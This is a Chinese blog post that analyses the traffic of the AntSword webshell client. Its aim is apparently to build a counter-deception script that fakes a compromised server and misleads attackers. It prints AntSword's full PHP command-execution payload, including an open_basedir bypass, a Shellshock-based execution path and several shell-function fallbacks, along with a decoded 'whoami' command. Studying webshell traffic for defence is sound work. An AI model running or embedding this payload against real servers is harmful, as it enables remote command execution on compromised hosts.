全部标签
写点什么
开源云计算行业资讯玩转写作平台算法Python人工智能区块链Linux前端个人成长面试架构师编程企业动态新基建敏捷安全读书笔记高效工作团队管理创业活动专区生涯规划知识管理运维产品经理 查看更多

蚁剑的分析和利用

作者:网络安全学海
  • 2021 年 11 月 19 日

  • 本文字数:3733 字

    阅读完需:约 12 分钟

前言

这篇文章主要是以虚拟终端模块执行命令功能为例,逐步分析,并通过分析结果优化对应脚本的方法。

前情回顾

已经解决了初步认证的问题



经分析,通过连通密钥首即可通过蚁剑的认证,达到连接成功的目的,但是连接成功后会出现这种情况。



所以我进行初步猜测,虚拟终端初始化没有问题,执行命令出现问题,所以我最开始的分析就先从执行命令功能开始进行。


【一>所有资源获取<一】1、200 份很多已经买不到的绝版电子书 2、30G 安全大厂内部的视频资料 3、100 份 src 文档 4、常见安全面试题 5、ctf 大赛经典题目解析 6、全套工具包

一、流量分析

首先我们抓一个虚拟终端的执行命令请求包进行初步的分析,之后我们将数据流进行 URL 解码。




PS:为了大家方便查看,我将请求格式化后贴在了下面。


f72002fb14c8e8 = SEY2QgL2QgIkM6L3BocHN0dWR5X3Byby9XV1cveWpmeiImd2hvYW1pJmVjaG8gOGIyMjZlNDQmY2QmZWNobyA5ZGI3Zjg4Yzg3 & lefdf77c8e3d95 = yBY21k & pota123 = @ini_set("display_errors", "0");@set_time_limit(0);$opdir = @ini_get("open_basedir");if ($opdir) {    $oparr = preg_split("/\\\\|\//", $opdir);    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);    $tmdir = ".5062e111e";@    mkdir($tmdir);@    chdir($tmdir);@    ini_set("open_basedir", "..");    for ($i = 0; $i < sizeof($oparr); $i++) {@        chdir("..");    }@    ini_set("open_basedir", "/");@    rmdir($ocwd.        "/".$tmdir);};
function asenc($out) {    return $out;};
function asoutput() {    $output = ob_get_contents();    ob_end_clean();    echo "6d29".    "1125";    echo@ asenc($output);    echo "699".    "aa2b";}ob_start();try {    $p = base64_decode(substr($_POST["lefdf77c8e3d95"], 2));    $s = base64_decode(substr($_POST["f72002fb14c8e8"], 2));    $envstr = @base64_decode(substr($_POST["w641c9ee55f10c"], 2));    $d = dirname($_SERVER["SCRIPT_FILENAME"]);    $c = substr($d, 0, 1) == "/" ? "-c \"{$s}\"" : "/c \"{$s}\"";    if (substr($d, 0, 1) == "/") {@        putenv("PATH=".getenv("PATH").            ":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");    } else {@        putenv("PATH=".getenv("PATH").            ";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");    } if (!empty($envstr)) {        $envarr = explode("|||asline|||", $envstr);        foreach($envarr as $v) {            if (!empty($v)) {@                putenv(str_replace("|||askey|||", "=", $v));            }        }    }    $r = "{$p} {$c}";
    function fe($f) {        $d = explode(",", @ini_get("disable_functions"));        if (empty($d)) {            $d = array();        } else {            $d = array_map('trim', array_map('strtolower', $d));        }        return (function_exists($f) && is_callable($f) && !in_array($f, $d));    };
    function runshellshock($d, $c) {        if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {            if (strstr(readlink("/bin/sh"), "bash") != FALSE) {                $tmp = tempnam(sys_get_temp_dir(), 'as');                putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");                if (fe('error_log')) {                    error_log("a", 1);                } else {                    mail("a@127.0.0.1", "", "", "-bv");                }            } else {                return False;            }            $output = @file_get_contents($tmp);@            unlink($tmp);            if ($output != "") {                print($output);                return True;            }        }        return False;    };
    function runcmd($c) {        $ret = 0;        $d = dirname($_SERVER["SCRIPT_FILENAME"]);        if (fe('system')) {@            system($c, $ret);        }        elseif(fe('passthru')) {@            passthru($c, $ret);        }        elseif(fe('shell_exec')) {            print(@shell_exec($c));        }        elseif(fe('exec')) {@            exec($c, $o, $ret);            print(join("", $o));        }        elseif(fe('popen')) {            $fp = @popen($c, 'r');            while (!@feof($fp)) {                print(@fgets($fp, 2048));            }@            pclose($fp);        }        elseif(fe('proc_open')) {            $p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);            while (!@feof($io[1])) {                print(@fgets($io[1], 2048));            }            while (!@feof($io[2])) {                print(@fgets($io[2], 2048));            }@            fclose($io[1]);@            fclose($io[2]);@            proc_close($p);        }        elseif(fe('antsystem')) {@            antsystem($c);        }        elseif(runshellshock($d, $c)) {            return $ret;        }        elseif(substr($d, 0, 1) != "/" && @class_exists("COM")) {            $w = new COM('WScript.shell');            $e = $w - > exec($c);            $so = $e - > StdOut();            $ret. = $so - > ReadAll();            $se = $e - > StdErr();            $ret. = $se - > ReadAll();            print($ret);        } else {            $ret = 127;        }        return $ret;    };    $ret = @runcmd($r.        " 2>&1");    print($ret != 0) ? "ret={$ret}" : "";;} catch (Exception $e) {    echo "ERROR://".$e - > getMessage();};asoutput();die(); & w641c9ee55f10c = Ut
复制代码


通过数据包的请求和响应我们取出最关键的两处。




通过初步分析我们得知一个信息,请求内容的核心代码位置存在关键的变量引用,这点开始引起了我的重视。(最后分析过全部功能后,把这块弄明白可以解决全部功能的问题)


PS:执行命令流量包的特征我就不写了,可以自行去分析流量包寻找特征。

二、代码分析

通过流量分析我们得到了一处变量串,并且得知解码方式,我们写个函数先给内容解密一下看看。


f72002fb14c8e8=SEY2QgL2QgIkM6L3BocHN0dWR5X3Byby9XV1cveWpmeiImd2hvYW1pJmVjaG8gOGIyMjZlNDQmY2QmZWNobyA5ZGI3Zjg4Yzg3&lefdf77c8e3d95=yBY21k&pota123=@ini_set("display_errors", "0")
复制代码



我们解密后得知变量的内容为到这里,我们已经获取了执行命令的唯一特征。(PS:这里我们可以直接通过对 base64 编码的方式来确定命令内容,具体细节就不多说了懂的都懂。)


cd /d "C:/phpstudy_pro/WWW/yjfz"&whoami&echo 8b226e44&cd&echo 9db7f88c87
复制代码



我们现在已经可以确定命令特征了,通过流量分析得到的特征,稍作修改我们就可以实现虚拟终端的全部功能了。但是我们还有一个关键问题没有解决,”返回连接那里执行命令返回一次内容后,路径发生变化导致后续命令执行失败“


三、整合分析

这块其实卡了很久,一直想为什么,按理来说,认证通过了命令也能成功解析应该是不会出现这个问题才对的,难道说请求包里有内容在控制路径?或者说这块的信息是当前路径?带着这种思路我打开了蚁剑的源码开始分析。


终于我找到了命令执行这块的核心代码,如下图。



我们可以看到这个就是我们代码分析处得到命令执行内容。我们关联一下两者之间的关系。


`cd "${path}";${cmd};echo [S];(pwd).path;echo [E]` : `cd /d "${path}"&${cmd}&echo [S]&cd&echo [E]` : `cd "${path}";${cmd};echo [S];pwd;echo [E]`);
复制代码


cd /d "C:/phpstudy_pro/WWW/yjfz"&whoami&echo 8b226e44&cd&echo 9db7f88c87
复制代码


我们很容易就可以看出来 8b226e44 9db7f88c87 就是对应的[S] [E],可是[S][E]是什么东西呢,难道是认证么,我们回过头来去分析流量包。



OK,问题解决了,也就是说我们接受到数据后,只返回了第一步认证(这里我叫做连通性密钥),而我们没有通过第二步认证([S]当前路径[E]),所以我们的蚁剑就只获取到了 win-raf7i2l9ph1\potato 这一个有效数据,自然而然在当前路径处渲染了 win-raf7i2l9ph1\potato 的内容了。所以我们命令执行只需要构造这样一个请求包


四、实现效果

最后只需要编写对应的脚本,这里我提醒一下大家,执行命令的数据包有两种特征。


后语

思路篇写的太急了,今天抽时间写了分析篇,主要拿命令执行这块来举例,其他功能虽然和命令执行特征不完全一样,但是也都是这个思路。这个手法我觉得最重要的是怎么让攻击者按照你的思路来走,一步一步降低他的防备心,最后落入你的反(PIAN)制 (JU) 当中去。

划线
评论
复制
发布于: 3 小时前阅读数: 4
网络安全信息安全渗透测试WEB安全安全漏洞
用户头像

网络安全学海

关注

我是一名网络安全渗透师 2021.06.18 加入

关注我,后续将会带来更多精选作品,需要资料+wx:mengmengji08

评论

发布
暂无评论
Copyright © 2021, Geekbang Technology Ltd. All rights reserved. 极客邦控股(北京)有限公司 | 京 ICP 备 16027448 号 - 5京公网安备京公网安备 11010502039052号
蚁剑的分析和利用